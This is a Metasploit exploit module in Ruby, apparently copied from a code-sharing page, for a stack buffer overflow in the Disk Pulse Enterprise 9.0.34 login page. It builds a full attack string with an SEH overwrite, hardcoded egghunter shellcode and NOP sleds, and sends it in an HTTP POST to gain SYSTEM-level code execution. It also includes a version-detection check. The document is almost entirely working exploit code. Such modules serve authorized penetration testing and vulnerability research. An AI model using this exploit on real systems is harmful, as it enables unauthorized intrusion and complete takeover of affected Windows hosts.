Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::Remote::Egghunter
11
  include Msf::Exploit::Remote::Seh
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'Disk Pulse Enterprise Login Buffer Overflow',
16
      'Description'    => %q{
17
        This module exploits a stack buffer overflow in Disk Pulse Enterprise
18
        9.0.34. If a malicious user sends a malicious HTTP login request,
19
        it is possible to execute a payload that would run under the Windows
20
        NT AUTHORITY\SYSTEM account. Due to size constraints, this module
21
        uses the Egghunter technique.
22
      },
23
      'License'        => MSF_LICENSE,
24
      'Author'         =>
25
        [
26
          'Chris Higgins', # msf Module -- @ch1gg1ns
27
          'Tulpa Security' # Original discovery -- @tulpa_security
28
        ],
29
      'References'     =>
30
        [
31
          [ 'EDB', '40452' ]
32
        ],
33
      'DefaultOptions' =>
34
        {
35
          'EXITFUNC' => 'thread'
36
        },
37
      'Platform'       => 'win',
38
      'Payload'        =>
39
        {
40
          'BadChars' => "\x00\x0a\x0d\x26"
41
        },
42
      'Targets'        =>
43
        [
44
          [ 'Disk Pulse Enterprise 9.0.34',
45
            {
46
              'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll
47
              'Offset' => 12600
48
            }
49
          ],
50
        ],
51
      'Privileged'     => true,
52
      'DisclosureDate' => '2016-10-03',
53
      'DefaultTarget'  => 0))
54

55
    register_options([Opt::RPORT(80)])
56

57
  end
58

59
  def check
60
    res = send_request_cgi({
61
      'uri'    => '/',
62
      'method' => 'GET'
63
    })
64

65
    if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.0\.34/
66
      return Exploit::CheckCode::Appears
67
    end
68

69
    return Exploit::CheckCode::Safe
70
  end
71

72
  def exploit
73
    connect
74
    eggoptions =
75
    {
76
      :checksum => true,
77
      :eggtag => "w00t"
78
    }
79

80
    print_status("Generating exploit...")
81

82
    sploit =  "username=admin"
83
    sploit << "&password=aaaaa\r\n"
84

85
    # Would like to use generate_egghunter(), looking for improvement
86
    egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
87
    egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
88

89
    sploit << rand_text(target['Offset'] - payload.encoded.length)
90
    sploit << "w00tw00t"
91
    sploit << payload.encoded
92
    sploit << make_nops(70)
93
    sploit << rand_text(1614)
94
    # Would like to use generate_seh_record(), looking for improvement
95
    sploit << "\x90\x90\xEB\x0B"
96
    sploit << "\x33\xA3\x01\x10"
97
    sploit << make_nops(20)
98
    sploit << egghunter
99
    sploit << make_nops(7000)
100

101
    # Total exploit size should be 21747
102
    print_status("Total exploit size: " + sploit.length.to_s)
103
    print_status("Triggering the exploit now...")
104
    print_status("Please be patient, the egghunter may take a while...")
105

106
    res = send_request_cgi({
107
      'uri' => '/login',
108
      'method' => 'POST',
109
      'content-type' => 'application/x-www-form-urlencoded',
110
      'content-length' => '17000',
111
      'data' => sploit
112
    })
113

114
    handler
115
    disconnect
116

117
  end
118
end
119

120